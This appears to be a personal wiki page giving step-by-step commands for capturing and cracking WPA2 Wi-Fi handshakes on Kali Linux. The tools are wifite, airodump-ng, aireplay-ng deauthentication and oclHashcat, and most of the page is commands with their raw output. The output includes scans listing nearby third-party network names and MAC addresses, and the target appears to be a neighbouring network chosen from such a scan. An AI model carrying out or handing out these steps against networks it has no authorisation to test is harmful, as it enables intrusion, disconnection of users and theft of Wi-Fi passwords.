capture_wpa_handshake
Table of Contents
Capture WPA2 handshake
Hardware
- Intel NUC
- Intel Centrino 6235
Install Kali
- Install Kali from USB.
- Create user account.
- Update.
apt-get update apt-get upgrade
- Install and enable SSHd.
apt-get install ssh /etc/init.d/ssh start update-rc.d ssh enable
Capture with wifite
- Start scanning.
# wifite wpa2 [+] scanning (mon0), updates at 5 sec intervals, CTRL+C when ready. NUM ESSID CH ENCR POWER WPS? CLIENT --- -------------------- -- ---- ----- ---- ------ 1 ------- 1 WPA2 34db no client 2 ------- 13 WPA2 34db no clients 3 UPC245788570 11 WPA2 30db wps 4 UPC486785_EXT 11 WPA2 26db wps 5 UPC WifiSpots 11 WPA2 25db no 6 UPC486785 11 WPA2 22db no clients 7 ------- 11 WPA2 21db no 8 UPC1461170 1 WPA2 19db no clients 9 VGV7519558FA2 6 WPA2 18db wps 10 UPC WifiSpots 1 WPA2 18db no 11 ------- 11 WPA2 18db no client 12 UPC501677338 36 WPA2 17db no 13 UPC245248760 6 WPA2 16db wps client 14 ------- 100 WPA2 15db no 15 H368N67798A 6 WPA2 13db wps 16 Ka1717169 9 WPA2 13db no client 17 UPC249259973 11 WPA2 13db wps client 18 UPC244634263 11 WPA2 13db wps 19 UPC240228706 1 WPA2 13db wps client 20 UPC WifiSpots 9 WPA2 12db no 21 UPC1263286 6 WPA2 11db no 22 UPC2176918 6 WPA2 11db no 23 UPC WifiSpots 6 WPA2 11db no 24 ------- 6 WPA2 10db wps 25 ------- 1 WPA2 10db wps 26 Sitecom8CF98C 8 WPA2 10db wps 27 ------- 1 WPA2 9db no 28 ------- 6 WPA2 9db no 29 UPC247811359 1 WPA2 9db wps clients 30 UPC241613374 11 WPA2 9db wps 31 UPC0988912 13 WPA2 7db no client [0:01:54] scanning wireless networks. 31 targets and 15 clients found [+] scanning (mon0), updates at 5 sec intervals, CTRL+C when ready.
- Press ctrl-c when ready
- Enter target number.
[+] select target numbers (1-19) separated by commas, or 'all': 2 [+] 1 target selected. [0:08:20] starting wpa handshake capture on "--------" [0:08:09] new client found: 04:F7:E4:51:E7:A8 [0:08:08] listening for handshake... [0:00:12] handshake captured! saved as "hs/--------.cap" [+] 1 attack completed: [+] 1/1 WPA attacks succeeded Schenkel (D4:CA:6D:53:23:41) handshake captured saved as hs/--------.cap [+] starting WPA cracker on 1 handshake [!] no WPA dictionary found! use -dict <file> command-line argument [+] quitting
- Clean the capture file.
# wpaclean cleanwpa.cap --------.cap Pwning --------.cap (1/1 100%) Net d4:ca:6d:53:23:41 -------- Done
- Convert .cap file to .hccap format for olcHashcat.
# aircrack-ng cleanwpa.cap -J out Opening cleanwpa.cap Read 3 packets. # BSSID ESSID Encryption 1 D4:CA:6D:53:23:41 -------- WPA (1 handshake) Choosing first network as target. Opening cleanwpa.cap Reading packets, please wait... Building Hashcat (1.00) file... [*] ESSID (length: 8): -------- [*] Key version: 2 [*] BSSID: D4:CA:6D:53:23:41 [*] STA: 04:F7:E4:51:E7:A8 [*] anonce: 3B 00 01 41 3D 46 19 79 80 E6 90 E6 AB 3C DB 07 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- [*] snonce: C6 0A 60 A0 05 03 AF CE FC E4 E7 24 72 4A 24 AC -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- [*] Key MIC: AD 60 F8 4B 42 B1 CF E7 9F 82 97 0D 11 B7 CC F1 [*] eapol: 01 03 00 75 02 01 0A 00 10 00 00 00 00 00 00 00 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 4E 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 04 01 00 00 0F AC 02 0C 00 Successfully written to out.hccap Quitting aircrack-ng...
- Try cracking with olcHashcat.
oclHashcat64.exe -m 2500 out-wpa2.hccap -a 3 -1 ?l?u?d ?1?1?1?1?1?1?1?1?1?1?1?1 Session.Name...: oclHashcat Status.........: Aborted Input.Mode.....: Mask (?1?1?1?1?1?1?1?1?1?1?1?1) [12] Hash.Target....: -------- (04:f7:e4:51:e7:a8 <-> d4:ca:6d:53:23:41) Hash.Type......: WPA/WPA2 Time.Started...: Thu Jun 12 22:01:32 2014 (2 mins, 5 secs) Time.Estimated.: > 10 Years Speed.GPU.#1...: 126.6 kH/s Speed.GPU.#2...: 129.0 kH/s Speed.GPU.#3...: 129.2 kH/s Speed.GPU.#4...: 124.4 kH/s Speed.GPU.#5...: 129.1 kH/s Speed.GPU.#6...: 129.0 kH/s Speed.GPU.#*...: 767.2 kH/s Recovered......: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts Progress.......: 94814208/16533293572437839872 (0.00%) Skipped........: 0/94814208 (0.00%) Rejected.......: 0/94814208 (0.00%) HWMon.GPU.#1...: 83% Util, 61c Temp, 61% Fan HWMon.GPU.#2...: 86% Util, 62c Temp, 60% Fan HWMon.GPU.#3...: 84% Util, 65c Temp, 48% Fan HWMon.GPU.#4...: 85% Util, 63c Temp, 44% Fan HWMon.GPU.#5...: 84% Util, 58c Temp, 40% Fan HWMon.GPU.#6...: 87% Util, 63c Temp, 48% Fan Started: Thu Jun 12 22:01:32 2014 Stopped: Thu Jun 12 22:03:40 2014
- Or try with wordlist and rules.
oclHashcat64.exe -a 0 -r rules\best64.rule -m 2500 -o foundpass.txt out-wpa2.hccap totaal_cleanfile.txt
Capture with airmon-ng airodump-ng
- Enable monitor mode on WiFi.
# airmon-ng start wlan0 Found 2 processes that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to kill (some of) them! -e PID Name 2506 NetworkManager 2633 wpa_supplicant Interface Chipset Driver wlan0 Intel 6235 iwlwifi - [phy0] (monitor mode enabled on mon0)
- Find nearest wireless networks. If targetting specific AP, fix channel with '-c <chan_num>'
# airodump-ng mon0 CH 8 ][ Elapsed: 1 min ][ 2014-06-12 21:06 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID D4:CA:6D:53:23:41 -61 158 25 0 13 54e. WPA2 CCMP PSK -------- D4:CA:6D:52:5D:E9 -61 141 13 0 1 54e. WPA2 CCMP PSK -------- DC:71:44:DE:35:F8 -66 234 0 0 11 54e WPA2 CCMP PSK UPC245788570 04:A1:51:22:3A:34 -76 158 8 0 11 54e WPA2 CCMP PSK UPC486785_EXT EA:40:F2:B1:A3:E7 -76 131 0 0 11 54e WPA2 CCMP MGT UPC WifiSpots E8:40:F2:B1:A3:E5 -78 134 9 0 11 54e WPA2 CCMP PSK UPC486785 CE:BC:C8:FE:EA:C3 -80 85 0 0 11 54e. WPA2 CCMP PSK -------- C8:BC:C8:FE:EA:C3 -80 93 2 0 11 54e. WPA2 CCMP PSK -------- 44:32:C8:FC:EB:9B -84 40 0 0 1 54e WPA2 CCMP PSK UPC1461170 88:03:55:55:8F:A2 -83 61 0 0 6 54e WPA2 CCMP PSK VGV7519558FA2 5C:A3:9D:80:A3:98 -83 44 0 0 6 54e WPA2 CCMP PSK UPC245248760 46:32:C8:FC:EB:9D -85 40 0 0 1 54e WPA2 CCMP MGT UPC WifiSpots 8C:E0:81:67:79:8A -86 20 0 0 6 54e WPA2 CCMP PSK H368N67798A 14:49:E0:A4:70:28 -86 13 3 0 11 54e WPA2 CCMP PSK UPC249259973 5C:A3:9D:98:21:F8 -86 17 0 0 11 54e WPA2 CCMP PSK UPC244634263 5C:A3:9D:FD:13:E8 -85 36 0 0 1 54e WPA2 CCMP PSK UPC240228706 00:0C:F6:91:6A:78 -88 22 1 0 11 54e. WPA2 CCMP PSK Sitecom916A78 C4:27:95:75:D8:95 -1 0 0 0 7 -1 <length: 0> DC:71:44:A8:08:88 -90 2 0 0 1 54e WPA2 CCMP PSK UPC242046314 CE:BC:C8:FE:EA:C4 -86 1 0 0 100 54e WPA2 CCMP PSK -------- DC:71:44:DE:35:F0 -84 1 0 0 36 54e WPA2 CCMP PSK UPC501677338 BSSID STATION PWR Rate Lost Frames Probe (not associated) 14:99:E2:43:58:65 -82 0 - 1 0 11 UPC1461170 (not associated) F0:25:B7:EB:D2:83 -90 0 - 1 0 1 H368N67798A D4:CA:6D:53:23:41 74:E1:B6:95:01:69 -71 0e- 0 0 9 D4:CA:6D:53:23:41 04:F7:E4:51:E7:A8 -84 0 -24 10 8 -------- E8:40:F2:B1:A3:E5 04:A1:51:22:3A:34 -1 0e- 0 0 1 C8:BC:C8:FE:EA:C3 F0:27:65:D7:0D:09 -86 0 - 1 0 1 44:32:C8:FC:EB:9B A4:D1:D2:6A:1B:1D -1 1e- 0 0 1 14:49:E0:A4:70:28 C0:CB:38:01:1D:31 -1 1e- 0 0 1 C4:27:95:75:D8:95 00:22:FA:96:D5:0C -82 0 - 6e 0 4
- Dump packets from target channel.
# airodump-ng --channel 11 --bssid 00:11:22:33:44:55 --write channel11 mon0
- Wait for handshake… or
- Deauthenticate client from network.
# aireplay-ng --deauth 0 -a <AP_MAC> -c <CLIENT_MAC> mon0
- Or if you don't know the MAC of any associated client, broadcast a deauth.
# aireplay-ng --deauth 0 -a <AP_MAC> mon0
- Extract handshakes.
tshark -r <input file name> -R eapol || wlan.fc.type_subtype == 0×88 -w <output file name>
capture_wpa_handshake.txt · Last modified: 2021/10/09 15:14 by 127.0.0.1